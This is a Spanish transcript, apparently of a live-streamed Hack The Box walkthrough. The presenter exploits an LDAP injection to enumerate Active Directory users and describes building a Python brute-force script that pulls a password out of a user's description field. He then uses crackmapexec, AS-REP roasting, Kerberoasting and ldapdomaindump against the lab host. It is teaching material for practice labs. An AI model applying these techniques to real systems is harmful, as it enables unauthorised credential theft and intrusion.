acaba pero empieza por a y eso es válido entonces la query normalmente te devuelve datos si le das al enter pues bueno fijaros a manson manson andrew aquí por detrás seguramente al ser directorio activo ante lo que nos estamos enfrentando si tú pones ldap active directory list of attributes para ver qué atributos existen en este caso vamos a poner si tal active directory attributes a secas attribute names a lo mejor este nos puede servir vamos a ver vale pues por ejemplo bueno para el primer nombre el nombre de atributo de ldap suele ser given name que si por detrás hay ldap que tiene pinta pues eso por ejemplo last name sería sn entonces bueno si esto de aquí porque si yo pongo amansom amansom es un usuario que quiero pensar que será un usuario válido a nivel de dominio o tal vez no aquí que pone hangel vamos a ver si este existe hangel vale este existe algunos existen a nivel de dominio y otros no eso es curioso pero esto de aquí si es el nombre del dominio pues esto es lo que tendría que ser esto de aquí el sam account name de forma que por detrás por ejemplo si tú pones hangel la query por detrás de ldap debería de ser algo tipo así esto es igual a y aquí como tú le estás metiendo tu valor a través del parámetro name pues en php sería algo cmd no eso es la costumbre algo así ciertamente en plan por detrás viaja una query ldap que filtra por el nombre de usuario en este caso existente en la máquina windows a través del parámetro name que lo percibes y te lo sustituye aquí ¿qué pasa? que nosotros aquí es donde estamos poniendo a asterisco porque esta query le da por detrás cuando se efectúa pues es válida tú le estás diciendo oye hay un usuario que empieza por a o que empieza por ejemplo de cara a un ataque de fuerza bruta además de a se suele probar a a a b a c a b porque pueden haber varios usuarios que empiezan por la a entonces por ejemplo a a nada pero a n o a m creo que era o cual era bueno este a manson pues puedes ir aplicando o por ejemplo j también pues te saldrá hangel pues claro como tú puedes en este caso como se está aplicando una inyección ldap y vemos que ldap se está ampliando por detrás claro tú puedes combinar atributos por ejemplo imaginaros que para yo poder obtener esta misma este mismo resultado que me está filtrando por hangel si yo por ejemplo cogiera imaginaros esto hangel si yo ahora filtro ponle tú por last name que es johnson que el last name en ldap suele ser sn pues bueno tú cuando quieres combinar dos búsquedas si yo aquí en hangel a nivel de inyección hago esto cierro la primera query o sea query abro una nueva y aquí aplico un nuevo filtro que va a ser sn igual a y le pongo por aquí johnson y no cierro nada porque ya por detrás la query te cierra ese paréntesis que se queda pendiente es similar a las inyecciones sql pero en este caso es con ldap pues yo podría probar hacerlo aquí si yo cierro abro y le digo que sn es igual a johnson y hago solo esto vamos a ver si me sale lo mismo enter y me sale lo mismo o sea que tiene pinta de que eso confirmado ya que es una inyección ldap aquí también podríamos probar a poner yo asterisco nos va a salir lo mismo si yo pusiera joa ya no porque el last name no es ese entonces bueno también hay un ataque que esto bueno esto lo explicamos en la academia de hecho en el curso de introducción al hacking hay una clase de inyección ldap de una hora y pico creo donde os explico pues como descubrir atributos válidos entre otras cosas porque claro estos son atributos pero a lo mejor hay otros cuyos nombres no conoces a los cuales puedes aplicar fuerza bruta y a lo mejor hay campos ocultos que tú aquí no ves que es normalmente por donde van los tiros con CTF siempre suelen ir por ahí y puedes enumerar cosas interesantes ¿no? entonces bueno yo lo que haría sería tenemos una forma de enumerar usuarios mira tenemos technicium también si ponemos aquí technicium pues también existe suponiendo que por ejemplo porque igual decís hostia y si por Kerberos no hubiera podido enumerar usuarios imaginaros que Kerberos por alguna razón está cerrado ponle tú ¿no? pues algo que se pueda hacer que bueno de primeras yo ya esto lo probaría para hacer una srproast attack para tratar de ver si puedo obtener TGTs ticket granting tickets a través de usuarios que no requieren de autenticación previo de Kerberos si por ejemplo pongo users.txt y me quedo con no sé cómo sería aquí la regex o sea sustituir del arroba en adelante quitarlo vale ahí está pues yo tengo este listado de usuarios potencial el cual como Kerberos está abierto pues con get npusers puedo intentar ver si algún usuario es a srproasteable porque eso me va a permitir obtener un hash el cual puedo tratar de craquear posteriormente mediante un ataque de fuerza bruta recordad que esos hashes que vemos no se pueden utilizar para hacer pass de hash vale entonces nada enter pues la idea es para tratar de solicitar un TGT para algún usuario que sea srproasteable sin proporcionar contraseña porque por el momento no conozco ninguna pues eso no pass y con users files o sea file le indicas el listado de usuarios y luego el dominio entonces esto el listado de usuarios y el dominio sé que es analyzes.htb le damos y fijaros el usuario jdu no requiere de autenticación previa de Kerberos o sea que en este caso no aplica con ninguno aplica si alguno lo hubiese requerido me habría salido y luego con el parámetro request habría obtenido el TGT que sería un hash que luego puedo craquear vale y a lo mejor tienes una contraseña potencial luego a través de la cual luego puedes hacer cositas pero bueno por ahora no es el caso así que esto fuera y bueno eso imaginaros que yo que sé nos hubiéramos querido montar un script en python que nos permitiera listar usuarios del dominio porque aquí veo que se aplica la inyección y que puedo enumerar cosas bueno yo lo que habría hecho sería esto me habría ido al directorio este habría puesto ldap injection punto py y bueno por aquí habría puesto el shibank habría importado un par de librerías que vamos a necesitar requests por ejemplo necesitaríamos re signal pdb para aplicar debugging from bueno from term color import color para los colores por favor directo from pawn import voy a jugar con pawn tools para jugar con barras de progreso vamos a jugar también con time vamos a jugar con sys y yo creo que ya está cuando haga control c ya sabéis que a mí me gusta que cuando haga control c pues que el flujo del programa de mi script en plena ejecución vaya de forma controlada a una función que yo controle para definir como quiero que el script concluya de forma que eso se puede controlar de esta forma signal sigint dev handler esto va a ser para que cuando haga control c se pille esa señal y directamente se aplique una llamada a dev handler que le pasas dos valores de señal que tienes que percibir por aquí con los nombres que tú quieras yo por ejemplo lo suelo llamar sigiframe para que aquí pues te muestre algo por ejemplo yo en formato rojo lo que quiero que me muestre es esto que me ponga saliendo puntos suspensivos y que me salga con un código de estado no exitoso ¿qué voy a conseguir con esto? pues por ejemplo si el flujo del programa comienza por aquí yo algo que puedo hacer es si estoy aquí ante un slip de 10 segundos cuando haga un control c debería de ver saliendo porque es por donde va el flujo de mi programa cuando fuerce la salida o sea python 3 ldap injection control c y saliendo entonces ya a partir de ahí puedes controlar todo lo que necesites también podrías seguir con fuz infiltrando por longitud de la respuesta para tratar de averiguar cuando un usuario es válido o no jugando con ufuz por ejemplo cosas de estas sí o con un ataque de tipo intruder también desde burpsuite podrías hacer cositas pero yo recomiendo más python creo que es más cómodo entonces bueno ¿qué haría ahora? pues bueno yo lo primero que haría sería lanzar una solicitud una consulta a esta url y tratar de parcer por el nombre de usuario una vez hayamos conseguido eso ya vemos como montamos aquí la lógica para aplicar la inyección ldap y aplicar la fuerza bruta ab entonces lo que vamos a hacer es poner por aquí ldap injection entonces death ldap injection y en esta función bueno yo arriba del todo voy a definir cuál es la url principal que no es esa de ahí es al principio esta de aquí entera entonces la url es esta pero sin el a asterisco eso luego lo voy a ir creando yo entonces nada ¿cómo efectuamos la consulta? una consulta normal por get pues requests vamos a decirle requests.get a main url lanzamos una solicitud por get a esta url y bueno si tal voy a meter un breakpoint aquí si que estaría interesante a lo mejor aquí sumarle la cadenita a asterisco que es lo que quiero poner por aquí pero en vez de ponerlo aquí lo quiero meter aquí porque aquí es donde voy a estar aplicando una iteración voy a ir iterando sobre una cadena que luego voy a declarar entonces por ejemplo vamos a intentar que el flujo del programa se detenga en la línea 26 ab entonces vamos a esto ejecutarlo y vale l fijaros estamos en la línea 26 de forma que en content voy a almacenar en este momento lo que vale r.text que es la respuesta del servidor de la consulta que he lanzado de forma que si yo muestro lo que vale content fijaros que todo esto es esto mismo entero por ahí saldrá amansom en algún lugar amansom ahí está pues el usuario está contenido entre las etiquetas strong de forma que si yo ahora por ejemplo quisiera crear una regex que me permitiera filtrar únicamente por el nombre de usuario yo podría jugar con find all para en raw sobre la respuesta del servidor decirle oye yo tengo esta cadena y como me quiero quedar con lo que hay aquí dentro esta sería la regex en cuestión para filtrar por la data que está contenida entre estas etiquetas le das al enter y ahí está amansom que bueno es una lista la cual el primer elemento es el que me interesa para que me lo represente en formato cadena de forma que si yo ahora esto me lo copio lo puedo trasladar al script me lo copio me abro esto y bueno si quisiera obtener el nombre de usuario username que sería esto pero no de content sino de r.text que lo de content fue para el modo debugger para que vierais bueno porque lo quería almacenar y bueno aquí podríamos tratar de mostrar lo que sería el usuario si esto por ejemplo me lo ejecuto esto lo que me va a devolver es el nombre de usuario poco más ahora bien en vez de A aquí es donde hay que ir probando B, C, D, E, F etc. para ir probando las inyecciones L-DAP entonces bueno yo lo que voy a hacer es que con Python importando la librería string si tú haces asci lowercase tienes todas las posibilidades de caracteres para no escribirlas tú también tienes en este caso uppercase para mayúsculas tienes digits también o tienes punctuation que es para los caracteres especiales que hay que tener cuidado con el asterisco y los paréntesis porque si la contraseña tiene estos caracteres al estar en L-DAP al aplicar la query puede entrar en conflicto pero bueno ahora vemos cómo gestionar esa parte si los queréis todos podéis poner que si es un dir de esto hay uno en concreto que es printable esto de aquí si tú haces string.printable ahí tienes todas las posibilidades pero yo hay ciertas cosas que no quiero poner entonces prefiero controlarlo yo a mano ¿vale? ¿podrían haber usuarios que inicien con dígitos? sí también con números bueno a nivel de sistema en Windows a ver yo creo que sí pero no voy a probar usuarios con números no estoy del todo seguro si filtramos aquí por claro es que esto es en general este de aquí aquí seguramente hayan números sí efectivamente creo que sí pero de momento vamos a considerar como nombre de usuario que únicamente hay usuarios con caracteres en minúsculas o mayúsculas en tal caso pero bueno yo lo que haría aquí sería crear un listado de caracteres a nivel de cadena string.asci lowercase de forma que en characters voy a tener todos los posibles caracteres de la a a la z en minúscula y aquí voy a ir iterando sobre cada carácter de este conjunto de caracteres o sea forcharacter incharacters todo esto lo desplazo para allá y claro aquí en vez de una a es donde iría nuestro character por el que vamos a estar iterando esto va a estar en formato fstrings esto sí te lo voy a poner entre doble comillas y nada aquí iría el carácter en cuestión ¿vale? de forma que eso la url va a estar compuesta por todo esto más el carácter en cuestión deliterable que estoy que es la cadena pues por el que estoy recorriendo de forma que bueno como siempre me va a mostrar el usuario claro aquí hay que hacer una pequeña distinción porque si yo esto me lo ejecuto claro cuando el usuario existe que se ve que hay un usuario que es badam te pone el usuario pero cuando no te pone contact porque claro el campo username para algo que no existe es contact entonces cuando me ponga esto simplemente no quiero que me lo muestre sería lo idóneo entonces aquí tú le puedes decir oye si esto está en username o más bien not in si no está en username entonces quiero que me muestre el usuario de hecho si tal en formato colorizado podríamos hacer esto podríamos poner palet user dos puntos que esto va a estar en un principio en podríamos ponerlo en gris o sea en gris en amarillo coño y el usuario es válido en azul que aquí en un principio creo que se podría poner así mismo dentro y aquí color it y aquí en formato azul puedes poner en formato en formato f strings hostia que me muero podríamos poner poner el nombre de usuario que sería username ahí está vamos a ver si esto le mola o es una fumada eso que he montado ahí está un poco raro vale no guay pues fijaros usuario válido amansom badam hangel lc y tecnician claro que pasa que un usuario o tres usuarios o dos pueden comenzar con la letra a entonces yo en estos casos cuando estoy en una inyección en el edad lo que suelo hacer es que hago dos iteraciones juego con un bucle anidado para recorrer dos veces la posibilidad a a a b a c a d a f así continuamente y luego b a b b b c b b b b e etc es más cómodo que poner un único carácter porque si un usuario tiene o varios usuarios empiezan por la a te va a mostrar el primero no vas a poder ver los demás vale entonces yo aquí normalmente lo que hago es for first characters in characters todo esto lo desplazo para allá aquí for second character de forma que esto va a estar compuesto por first character second character para que veáis esto como se ve porque igual no habéis entendido bien pero la idea es eso fijas la a e itera a b c d e o sea que vas teniendo a a a b a c a d etc luego el siguiente es la b aquí pues fijas la b b a b b b c etc para verlo más bonito vamos a jugar con una barra de progreso que lo veréis mucho mejor vamos a llamarlo si tal ldap injection p1.status vamos a poner starting ldap injection vamos a darle al usuario un tiempo de dos segundos para que pueda leer ese mensaje y bueno en la inyección ldap en esta barra de progreso vamos a ir actualizando su estado para ver la composición de lo que sería la url más esto mismo realmente lo vamos a reutilizar porque quiero que a nivel de cadena me muestre esto mismo de forma que eso en la barra de progreso ya debería de ir viendo esto vamos a ver si sale ldap vale veis ahí se va viendo a todas las combinatorias c tal d vas fijando una vas probando por fuerza bruta a las demás y bueno ahí vas viendo todas las posibilidades y ahora si que igual encuentras más usuarios porque si un usuario empieza por a pero luego se llama yo que se ángel y amansom pues a n te lo pillaría y te lo va a reportar que también pueden haber usuarios que empiecen por a m entonces ya depende de ti si luego quieres montar combinatorias triples con un triple bucle anidado para que contemple tres caracteres de posibilidad y ya está pero a más metas más te va a tardar vale ángel gracias por el prime se agradece un montón el apoyo esto es programación pura y dura con python no puro y duro ahí de la potencia absoluta ralentiza el script renderizar esa progress bar bueno no se tarda tanto pero a más muestres las cosas por pantalla más te va a tardar eso por supuesto david arangonk gracias por el prime y chrisok también se agradece un montón el apoyo abe vale pues que hacemos tenemos usuarios ahora bien y que tenemos usuarios no se puede aplicar el asr proast attack ningún usuario bueno no hemos validado si algún usuario es que el verosteable pero algo que podemos hacer es esto como tenemos un listado potencial de usuarios que no se si igual falta alguno puede faltar alguno a lo mejor a ver vamos a abrirnos esto puede faltar alguno puede ser a ver eh ahí está vale a johnson lo tenemos c williams lo tenemos w smith lo tenemos hangel technicium jdu también a johnson si y aquí con la inyección que encontramos encontramos algún usuario más porque también si encontramos otro más podríamos probar de nuevo el asr proast amansom vale ese no lo tenemos amansom badam solo que claro mmm si pueden existir solo que kerbrute igual no está en el diccionario contemplado vale a amansom ahí está badam ese tampoco está jangel ese sí estaba lzen ese es otro y vamos a ver si falta alguno más falcon grabs gracias por el prime se agradece mucho ese apoyo vale technicium yo creo que ya están todos get np vamos a volver a ser esto y vale ningún usuario es asr proasteable algo más que probaría yo pues jugaría con crackmapexec para aplicar un ataque de fuerza bruta de dos tipos uno de ellos es empleando el diccionario de usuarios tanto como usuario y como contraseña iría en paralelo primeramente de forma que la primera línea a nivel de usuario va a ser la misma que voy a privar o sea que voy a probar a nivel de contraseña voy a ir como en paralelo de forma que eso esto lo que quiere decir es que si yo me abro esto lo que voy a probar es jdujdu a johnson a johnson como usuario y contraseña c williams c williams w smith w smith pues así con todo para conseguir eso tienes que indicarle a crackmapexec que que no quieres como tal aplicar fuerza bruta creo que creo que hay por aquí un modo si tú pones help y filtras por brute no brute force esto de aquí que no quieres aplicar fuerza bruta pues esto y bueno en caso de que alguna credencial sea válida normalmente separa el escaneo y como no queremos que se pare sino que continúe buscando más credenciales pues continue on success que esto es para que continúe en caso de éxito de que te encuentre alguna credencial esto va a ser rápido vamos a ver si encontramos algo y bueno failure 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 ninguna credencial es válida así que poca cosa lo otro que iba a probar es no hacerlo en paralelo sino que para cada usuario pruebe como contraseña todos los otros nombres de usuario que no es la primera vez que igual nos enfrentamos a a eso a que de pronto la contraseña de un usuario es el nombre de usuario de una lista que tenemos de forma que eso vamos a verla al enter y a ver si encontramos algo de momento que tal todo bien o como va el rollo lo estamos entendiendo todo o se está complicando guazos suikin se agradece un montón el apoyo fenomenal si vale guay y nada no encontramos nada o sea que cuidado con los vectores de entrada aquí que esta máquina es puñetera se complica pero tú lo haces fácil tito bueno lo entiendo pero yo de esto no he practicado mucho bueno lo importante es que se entienda y luego cuando lo vayáis practicando de vuelta pues os quedará más claro vale ninguna credencial es válida toma ya pues entonces eh aquí tiene que haber algo nosotros de inyecciones LDAB que hemos tocado hemos hecho ya bueno yo creo que ya si habéis hecho muchas máquinas donde hemos tocado inyecciones LDAB que creo que han sido varias ya bueno a nivel de STF a los que nos hemos enfrentado hay veces en las que a nivel de atributo en vez de los que están por aquí ya sabéis que atributos de LDAB válidos hay algunos como estos description que es la descripción de un usuario hay veces que nosotros con RPC Client jugando con la query esta de queridysinfo podíamos listar de los usuarios del dominio sus descripciones y en las descripciones a veces te meten contraseñas que es a nivel de chuletilla o sea es como tipo STF total pues hay veces que hay ciertos campos que bueno aquí en este caso no se muestran como por ejemplo la descripción o bueno hay un campo password que podríamos tratar de pillar también a ver si podemos pillar la contraseña de este usuario pero me parece que no había campo password podríamos aplicar fuerza bruta yo lo que haría si estuviera en un examen sería crearme un listado de todos estos atributos e ir probando por cada atributo un reconocimiento o un ataque de fuerza bruta de caracteres para ir viendo si para qué atributo o sea para ir viendo para qué atributo pues existen datos almacenados ¿no? por ejemplo si quisierais ver aunque no sé si están a lo mejor y figuran pero están cifradas y no en texto claro por ejemplo el atributo es password ¿no? bueno pues si yo aquí le digo usuario amansom cierro abro y le digo password igual a a a asterisco pues b asterisco podríamos ir probando esto pero no sé yo si en este caso esto tenía ese campo pero se puede probar perfectamente o sea simplemente esto es a nivel informativo de lo que se nos ve por consola que sería a ver sería considerando el usuario amansom por ejemplo que sería hasta aquí esto ya fuera ya no va a ser un bucle anidado esto hay que meterlo para la izquierda vale pues por ejemplo probando esto sería amansom password es igual a y aquí en tal caso es donde iría el carácter ¿no? aquí es donde pondríamos character a secas o sea que aquí tendríamos que poner character y ahora aquí pues aplicar eso mismo que tenemos por ahí arriba sería amansom password es igual a character y asterisco vamos a intentar ver si podemos para este usuario pillar a nivel de contraseña el primer carácter porque lo dicho aquí el asterisco juega el mismo papel dices oye yo sé que la contraseña empieza por a y si ya sé que empieza por a ya luego puedo ir diciendo vale pues fijo la a a a a b a c que es una c pues a c a a c b a c y así vas probando entonces vamos a tratar de ver si sale en algún punto que contact no aparece voy a dejar esto así igual da igual vamos a ver que sale python 3 ldap inyection starting ldap inyection vale ahí está probando termina y no me ha salido nada o sea que siempre sale el apartado de contact a no ser que la contraseña pues pueda tener uppercase más digits también podría ser vamos a ver ahora ahora que le hemos metido un par más de caracteres ahí va probando y no el campo password no hay no tiene campo password sí que es cierto que eso otros campos que podríamos probar serían bueno el email pero el email será el usuario arroba analysis punto htb seguramente que aquí tenemos un panel también de autenticación donde probar aquí inyecciones ldap y sql no van a funcionar vale ya os lo adelanto pero habría que probarlo campo street no esto no nos no nos interesa el campo description pues podría estar interesante esto me lo voy a copiar y vamos a ponerlo en este caso aquí en vez de password pues cambiamos el atributo a description que es un atributo existente en el edad le metemos por aquí description y vamos a ver si el usuario amazon tiene descripción claro aquí hay que tener cuidado porque igual descripción no tiene contraseña pues tendrían que tener todos los usuarios pero descripción aquí ya sí que lo interesante a lo mejor sería crear una lista de usuarios para cada usuario ir probando el reconocimiento de bueno la fuerza bruta para ir iterando por cada carácter entonces aquí yo a lo mejor lo que haría sería users indicar usuarios válidos entonces por ejemplo tendríamos a jdu tendríamos a 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 w smith an an angel tec niciam amansom badam y l tem entonces vale teniendo esto yo lo que haría sería ir iterando por cada usuario de forma que for user in users vamos a ir probando una serie de cositas aquí yo mostraría en otra barra de progreso que usuario estoy de que usuario estoy enumerando su descripción primeramente es decir es decir p2 es igual a log.progress y por ejemplo username pues saber cuál estamos enumerando en plan enumerating la el usuario en cuestión que sería claro esto lo tendríamos que poner aquí dentro ¿no? más bien efectivamente porque de antes no se sabe qué usuario es el que estamos tratando entonces nada aquí pondría enumerating user description de forma que va a salir enumerando la descripción de jdu o de ajonson o de cwilliams etc de forma que claro ahora no es amanson aquí lo que tenemos que poner aquí sería en este caso user el usuario en cuestión que estemos probando y en cuanto a descripción respecta claro a mí lo que me interesa que podríamos hacer un primer barrido para ver si es correcto o no antes de empezar a hacer cositas podríamos probarlo claro aquí cuando nos salga contact normalmente si yo aquí por ejemplo ahora me pongo a enumerar la descripción de amanson si yo le digo a description es igual a a claro cuando no es válido no sale nada pero cuando es válido como por ejemplo lo que es el last name que sé que es amanson algo creo que era a asterisco o como era su last name amanson a secas vale cuando la query es válida cuando estás indicando un usuario te pone en el campo username el propio nombre de usuario de usuario entonces tanto si estás enumerando descripciones como contraseñas como lo que corresponda la cosa es que aquí en vez de contact ahora lo que nos interesa es filtrar por esto user si el usuario está en username que es por lo que estamos filtrando eso quiere decir que esa descripción empieza por el carácter en cuestión de forma que en vez de valid user podríamos crear otra barra de progreso que la voy a crear por aquí p3 es igual a log.progress que la vamos a llamar description que va a ser la encargada de mostrarnos la descripción que sería p3.status pues aquí meter primeramente vamos a poner character pero la idea sería aquí hacer una composición de lo que es la posible descripción ahora veremos esto vamos a bueno cabe destacar que en caso de que salga el usuario hay que hacer un break porque eso quiere decir que ha encontrado el primer carácter para la descripción del usuario en cuestión de forma que ya habría que saltar al siguiente pero quiero ver si algún usuario más que sea tiene una descripción vamos a echarle un ojo entonces vale veis ahí está probando con jdu enumerating jdu description no encontró nada pues con a johnson ahí está probando no encontró nada con c williams está probando no encuentra nada w smith en el campo description si encuentra algo te va a salir jangel nada technician description lo que pasa es que no sé si le estamos dando tiempo porque va tan rápido que claro cuando aplica el break yo creo que igual no te lo printea está yendo demasiado rápido a lo mejor lo suyo sería que cuando encuentre uno meter un slip de 10 segundos preferiblemente vamos a ver ahora faltó cambiar el request ah como como que es lo que no cambié ah cierto ah coño estamos enumerando siempre con amazon es verdad bueno pero vino bien el cambio este que hemos hecho también más ajustado vale user tal description character vamos a ver ahora es verdad veamos me encanta la librería puntools que bueno queda el progreso animado pues si tío queda muy chulo vale pues eso estos usuarios tienen pinta de que no tienen descripción así que ojo vale nada creo que nada no porque eran 10 segundos creo que fue lo que pusimos technician ahí está probando ojo description 9 el usuario technician tiene una descripción y empieza por 9 entonces ya puedo ajustar mi inyección para esto si tal quitarlo esto quitarlo también voy a convertir esto ahora a la barra de progreso 2 esto lo voy a quitar esto lo voy a quitar esto lo voy a tabular para la izquierda esto es la barra de progreso 2 la cual claro en este caso hay que tener en cuenta que a ver esto sería el dap injection esto es lo que me muestra la url y este es el progreso de la descripción por tanto si creo que esto es claro character me muestra el primer carácter pero es que yo no quiero el carácter quiero la composición de lo que va a ser la descripción entonces yo por aquí lo que haría sería crear una cadena description que va a valer nada una cadena vacía de forma que claro ¿cuántas veces tengo que aplicar esto? es decir esto va a ser una vuelta una única vuelta para descubrir este carácter pero es que lo suyo es que esto quiero que sea una composición de la descripción junto con el carácter de forma que ¿qué consigo con esto? primeramente como la descripción está vacía va a poner simplemente el carácter va a decir description igual a a asterisco b asterisco c asterisco tal cual ¿qué pasa? cuando description valga algo que cuando user esté en username cuando figure el nombre de usuario eso quiere decir que la contraseña o sea perdón que la descripción empieza por ese carácter pues ya puedo ir componiendo mi descripción para decirle que va a ser igual a un carácter que le voy a sumar que va a corresponder al carácter ¿qué consigo con esto? al aplicar el break para esa primera posición ya tiene el carácter fijado de forma que ahora pasas a la siguiente y ahora description va a valer ese carácter que almacenaste desde antes más el nuevo carácter y vas componiendo la descripción de forma que claro esto lo vas a tener que correr en bucle un par de veces y como no sé de qué longitud tiene la contraseña o sea la descripción que diga que se puede averiguar también pero para no complicarlo pues le puedo decir for position in range vamos a suponer que tiene 30 caracteres la descripción pues da igual no voy a hacer nada con ello pero es para poder correr esto en bucle continuamente porque eso lo que voy a conseguir con esto es lo siguiente ejecuto main url user vale esto aquí claro estamos dando por hecho que el usuario ahora es technetium que es el usuario cuya descripción vimos que existe para los demás no obtuvimos nada entonces technetium vale vamos a ver ahora starting let up injection otra vez ah si el usuario claro ahora sería otra vez de vuelta if bueno como sé que es technetium if technetium in username en este caso pues eso que ya sé cuál es el usuario en cuestión entonces si la query es válida el usuario va a figurar en la tabla vale y está dándole de forma que vale tenemos un 9 tenemos un slip creo así que lo voy a quitar cuando haga esto esto fuera y bueno cositas a tener en cuenta la contraseña puede tener también caracteres específicos especiales así que más que jugar con string punto puntuatium como hay ciertos caracteres ahí que pueden entrar en conflicto vamos a jugar con punto claro asterisco la contraseña puede tener asterisco pero ya estamos jugando con un asterisco en la query y se puede corromper hay que tener ahí cuidadito entonces bueno también tendríamos el ampersand tendríamos los paréntesis que bueno voy a jugármela suponiendo que estos caracteres no estarían en la contraseña si no podríamos jugar con urllib y jugar con quote para url encodear estos caracteres y nos lo podría dar como válido pero bueno voy a poner por ejemplo dólar el ampersand ya está pues porcentaje arroba hashtag posibles caracteres especiales para la contraseña de este usuario vale entonces bueno teniendo esto nada simplemente vamos a ir probándolo probándolo aquí cuando haya un asterisco puede dar conflicto esto y puede ser que pete porque por ejemplo si yo aquí pongo imagínate que asterisco asterisco puede ser que resulte en esto en que no se vea nada entonces bueno también cuando eso pase eso igual quiere decir que ese carácter es correcto pero a lo mejor está corrompiendo lo que sería la la query podríamos hacerlo así de primeras a ver que es lo que nos sale y a ver donde se queda en caso de que pete vamos a intentar esto ejecutarlo a ver que es lo que hace vale starting let up injection vale fijaros description vale 9 tenemos el primer carácter de la descripción 7 n una descripción un poco rara para este usuario y parece más una posible contraseña como pista que una descripción y vale fijaros ha petado en el asterisco de antes no y ha probado el asterisco o sea que eso quiere decir que ese asterisco es válido entonces yo lo que haría sería que esto lo metería en un try que intentes hacer todo esto y en caso de que haya una excepción como es controlada pues la voy a controlar pero me refiero a controlada de que sé que es porque es válido el carácter pues lo que voy a hacer es que description en caso de que haya un problema le voy a sumar a ese carácter lo voy a considerar como válido entonces voy a mostrar ese carácter en cuestión y aplico el break lo mismo que aquí pero lo manejo en la excepción entonces nada si ahora pruebo al asterisco pues debería de mostrármelo vamos a ver que es lo que nos sale ahora a ver si nos lo deja el euro ¿cómo? ¿cómo que el euro? ¿qué pasó? obsidian a tope con todo lo que explica hombre el buen sistema de apuntes ahí que nos falte vale fijaros ahí está probando cositas vamos a ver no estaría más guay si va haciendo el print de la descripción añadiendo los nuevos caracteres que va encontrando para que muestre completa la contraseña no estaría más guay si va haciendo el print de la descripción añadiendo los nuevos ¿y esto qué coño es cabrón? ¿qué es esto de aquí arriba? estamos componiendo la descripción ¿no? para mostrar todos los caracteres que va encontrando ¿o qué te pasa? estoy segato ah coño ya decía yo eh ah bueno ahí esto ha petado ya aquí algo pasa esto creo que no esto está curioso puede ser que sea hasta aquí a lo mejor y aquí ya empezó a haber conflictos podemos probarlo porque esto lo ha hecho muy rápido si no a ver claro te están dando como descripción una posible contraseña ¿no? y yo sé que el usuario technician es un usuario válido a nivel de dominio entonces algo que podríamos hacer es con crackmapexec validar ese usuario y contraseña para ver si es válido o no technician si yo por ejemplo pruebo esta contraseña vamos a ver si es válida y vale no es válida yo creo que es igual hasta aquí o una antes creo que le dio un pete ahí extraño vamos a ver ahora ahí está esto nada a ver ahora vale ahí es válida pues la contraseña al parecer estaba en la descripción mala práctica sabía que la dejaron ahí a lo mejor era una contraseña temporal para el técnico y se quedó ahí guardada y a través de la inyección en el edad pues la logra obtener ¿no? pero de la manera que existe el asterisco no comprueba los de después de él y a lo mejor no es ese es ese recuerda que yo soy el profesor y nunca me equivoco ¿vale? entonces nada ya teniendo esto válido como credenciales algo que puedo hacer es jugar con guión guión shares para listar por ejemplo los recursos compartidos a nivel de red si yo por ejemplo le doy al enter pues fijaros que bueno hay varios recursos administration a distancia cabrón está en francés el equipo o sea que cuidado esto de cara a ciertas cosas hay que tenerlo en cuenta porque igual el usuario administrator no existe y es administrateur o algo de esto por tanto vale podríamos probar ya supongo lo del RID brute para enumerar más usuarios válidos a nivel de dominio entonces aquí ya nos va a pillar más cosas de Williams SOC analyst este es otro J2 Technician Web Service bueno hay unos cuantos yo no sé si este usuario forma parte del grupo Remote Management Users que como está en francés pues tendrá otro nombre pero si forma parte de este grupo debería de poder conectarme o sea obteniendo una consola interactiva al servicio WinRM empleando EvilWinRM podríamos hacer esto WinRM y ver si por casualidad estas credenciales nos sirven para conectarnos pero nos pone que no yo de todas formas para hacerme la idea de que de qué usuario forma parte del grupo Remote Management Users lo que haría sería crear un directorio LDAP y ya que LDAP está activo si no recuerdo mal bueno sí tiene que estar activo por cojones pero externamente el 389 está abierto pues jugaría con LDAP Domain Dump que esto te crea un reporte bastante chulo de forma que nada la idea es indicar el usuario tienes que indicar el dominio análisis tienes que indicar el usuario Technician la contraseña que es esta y la IP en un principio que es esta de aquí si le das al enter esto ahora mismo lo que acaba de hacer es aplicarte un reconocimiento de forma que por ejemplo si me monto un servidor HTTP con Python y me voy aquí a localhost pues bueno Domain Users y ahí puedo ver los usuarios existentes del dominio en este caso está SVC la IAM no sé qué y vale usuarios que forman parte del grupo Remote Management Users Usuarios de gestión remota creo que es esto Utilizators de gestión a distancia me parece que es esto lo de Remote Management Users y tenemos a John Do y a Will Smith a W Smith en este caso por tanto claro necesito disponer de sus credenciales no las tengo pero en caso de que tenga alguna contraseña ya sea de J Do o de W Smith pues se puede llegar a tensar el poder enumerar por solo estar en la red interna del server contaría como vulnerabilidad bueno si puedes enumerar cosas tiene su criticidad por tanto sí se puede catalogar como una posible bueno no fuga de información pero estás aplicando una numeración a través de determinados servicios lo suyo es reportarlo sí eso se reportaría en un informe bueno como tengo credenciales válidas algo que probaría también sería intentar aplicar un Kerberosting attack o sea ver si algún usuario es Kerberosteable cuando ya dispones de credenciales en vez de get npusers pues getusers spn que es de in packet y bueno probar esto otro vamos a ver si algún usuario Kerberosteable en este caso solicitarías con el parámetro request un tgs un ticket granting service que es otro hash que puedes intentar craquear entonces nada el dominio analysis analysis .htb el usuario technicium y la contraseña esta de aquí como hay un carácter ahí especial vamos a ponerle esto entre comillas simples enter y no entries found o sea que ningún usuario es Kerberosteable por tanto hola xavi la inyección SQL no es útil en este caso no porque no se emplea SQL por detrás se emplea LDAP y las queries por detrás que viajan son en formato LDAP que es lo que hemos descubierto vale por tanto que hago pues de momento teníamos un panel de autenticación por aquí algo que se podría probar porque de momento poco más podemos hacer escoger el usuario que bueno es email technician arroba analysis punto htb con esta contraseña para dentro cabrón vale pues se ve que estas credenciales se reutilizan para este panel de autenticación de forma que estoy conectado como losorio technician que recordad que esta contraseña estaba en la descripción de un de lo que hemos enumerado a través de la inyección LDAP vale que opinas de auto hotkey me suda la polla entonces vamos a irnos por ejemplo a tickets que bueno esto de aquí como tal no es nada así que por ejemplo lenguaje de programación bueno php windows server is no vemos que sea un gestor de contenidos como tal o algo tipo wordpress drupal o algo específico un desarrollo me refiero específico de que conozcamos creo que es algo propio interno internal punto analysis punto htb que es donde estamos bueno hay una serie de tickets por ejemplo john do que es el usuario que forma parte del grupo remote management users seems to be related with new kerberos out no resuelto ojo eh detail y te dice seems to be related with new kerberos out mi ticket tgt falla a la hora de tratar de autenticarme al controlador de dominio vale curioso pero esto no nos dice gran cosa vamos a irnos para atrás tendríamos este otro failing to execute hta files no resuelto bueno whenever i try to run an hta file like the it showed me i get weird errors about security or failing to execute i don't know what to do pues muy bien john smith web panel mysql error bueno 